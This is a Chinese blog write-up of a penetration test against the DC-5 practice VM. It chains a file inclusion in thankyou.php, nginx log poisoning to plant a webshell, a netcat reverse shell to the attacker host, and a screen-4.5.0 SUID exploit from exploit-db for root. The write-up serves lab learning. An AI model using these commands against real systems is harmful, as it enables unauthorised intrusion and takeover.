dc-5靶机渗透记录

dc-5靶机渗透记录

实验环境

  • 靶机:DC-5靶机(192.168.126.137)
  • 攻击机:kali Linux(192.168.126.129)

信息收集

ip:192.168.126.137

开放的端口:

80/tcp open http nginx 1.6.2
111/tcp open rpcbind 2-4 (RPC #100000)
运行: Linux 3.X|4.X
操作系统CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
操作系统详细信息: Linux 3.2 - 4.9

渗透测试

1.漏洞发现与getshell

发现打开了80端口,这里我们登上直接web端

在contact页面发现有留言板块,这里的话考虑xss

image-20211112231031039

然后…就没有然后了,显然是不存在的

通过查一下大佬们的博客,发现在提交后的thankyou.php页面存在文件包含漏洞,自己上手试一下
在这里插入图片描述
验证成功,发现存在文件包含漏洞

image-20211112231720638

到这里的话,就不知道该如何继续了,百度之后,发现了大神们的骚操作

利用nginx日志实现写入webshell

http://192.168.126.137/thankyou.php?file=/var/log/nginx/access.log
http://192.168.126.137/thankyou.php?file=/var/log/nginx/error.log

这里写入shell,打开error.log发现并没有报错日志,判定可以进行日志写入shell

image-20211112233546063

image-20211112233512927这里看到蚁🗡连接成功,拿到webshell
在这里插入图片描述image-20211112233818807

2.提权

nc -e /bin/bash 192.168.126.129 4567
在这里插入图片描述image-20211113002618703
可以看到,反弹shell成功,获取交互

python -c 'import pty;pty.spawn("/bin/bash")'

image-20211113002917743

经过一番文件查找,也没有找到有用的信息

思考其他的提权方法

想到可以通过suid进行提权

image-20211113003325625

查找具有suid权限的命令

find / -perm /4000 2>dev/null

image-20211113003626868

发现screen-4.5.0,这里可以直接使用kali查找发现screen-4.5.0的漏洞脚本文件

searchsploit screen 4.5.0

image-20211113004204212

cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh

cp /usr/share/exploitdb/exploits/linux/local/41152.txt 41152.txt

image-20211113004945341

gcc -fPIC -shared -ldl -o libhax.so libhax.c

image-20211113005304119

将41154.sh中下面一部分c语言代码另存为rootshell.c

gcc -o rootshell rootshell.c

image-20211113005345609

将41154.sh中剩下部分代码另存为dc5.sh脚本文件

并在保存dc5.sh文件输入 :set ff=unix ,否则在执行脚本文件时后出错

image-20211113011103216

将三个文件通过蚁🗡上传到/tmp目录下

image-20211113011859271

www-data@dc-5:/tmp$ chmod +x dc5.sh

www-data@dc-5:/tmp$ ./dc5.sh

image-20211113011751141

image-20211113012031356

获取root权限后,进入root目录下,成功获取thisistheflag.txt文件

image-20211113012246883

总结

渗透步骤

1.在web端使用xss,发现留言板,使用xss失败后,进行文件包含漏洞利用;

2.通过利用nginx日志实现写入webshell,使用蚁🗡连接;

3.执行反弹shell,getshell成功;

4.通过suid进行提权;

自我总结

1.爆破后台路径的字典不够,导致基本上是通过看大佬的博客来直接操作的;

2.对于漏洞脚本文件不够了解,导致即使kali里面可以直接搜索到漏洞的脚本文件,也不会使用;

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值